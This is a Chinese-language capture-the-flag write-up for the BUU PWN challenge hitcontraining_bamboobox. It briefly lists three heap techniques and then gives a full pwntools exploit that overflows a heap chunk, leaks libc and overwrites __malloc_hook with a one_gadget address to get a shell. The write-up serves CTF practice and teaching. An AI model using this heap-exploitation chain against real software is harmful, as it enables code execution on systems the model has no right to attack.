1. 程式人生 > 實用技巧 >BUU PWN hitcontraining_bamboobox

BUU PWN hitcontraining_bamboobox

  本來想學習house of force,結果沒用就直接做出來了。。。我用了三種方法來做這道題。

  1.fastbins attack

  2.unlink

  3.house of force

  可以改寫got表,程式在edit的時候可以進行溢位。

fasbins attack

  通過溢位改寫size欄位,構造堆塊重疊,洩露libc,改寫fd指標,通過realloc調整棧幀,打__malloc_hook拿shell。常規操作,直接貼exp了

 1 from pwn import *
 2 
 3 p = process('./pwn')
 4 libc = ELF('./libc.so.6
') 5 context.log_level = 'debug' 6 7 def duan(): 8 gdb.attach(p) 9 pause() 10 def add(size,content): 11 p.sendlineafter('choice:','2') 12 p.sendlineafter('name:',str(size)) 13 p.sendafter('item:',content) 14 def show(): 15 p.sendlineafter('choice:','1') 16 def edit(index,size,content):
17 p.sendlineafter('choice:','3') 18 p.sendlineafter('item:',str(index)) 19 p.sendlineafter('name:',str(size)) 20 p.sendafter('item:',content) 21 def delete(index): 22 p.sendlineafter('choice:','4') 23 p.sendlineafter('item:',str(index)) 24 25 og = [0x45226,0x4527a,0xf0364,0xf1207]
26 27 add(0x20,'aaaaaaaa') 28 add(0x20,'bbbbbbbb') 29 add(0x60,'cccccccc') 30 add(0x10,'cccccccc') 31 32 edit(0,0x30,'a'*0x20+p64(0)+p64(0xa1)) 33 delete(1) 34 add(0x20,'aaaaaaaa') 35 show() 36 libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.symbols['__malloc_hook'] 37 malloc_hook = libc_base+libc.symbols['__malloc_hook'] 38 realloc = libc_base+libc.symbols['realloc'] 39 print 'libc_base-->'+hex(libc_base) 40 print 'malloc_hook-->'+hex(malloc_hook) 41 shell = libc_base+og[3] 42 43 add(0x60,'bbbbbbbb') 44 delete(4) 45 edit(2,0x10,p64(malloc_hook-0x23)) 46 add(0x60,'aaaaaaaa') 47 add(0x60,'a'*(0x13-0x8)+p64(shell)+p64(realloc+20)) 48 p.sendlineafter('choice:','2') 49 p.sendlineafter('name:',str(0x10)) 50 p.interactive()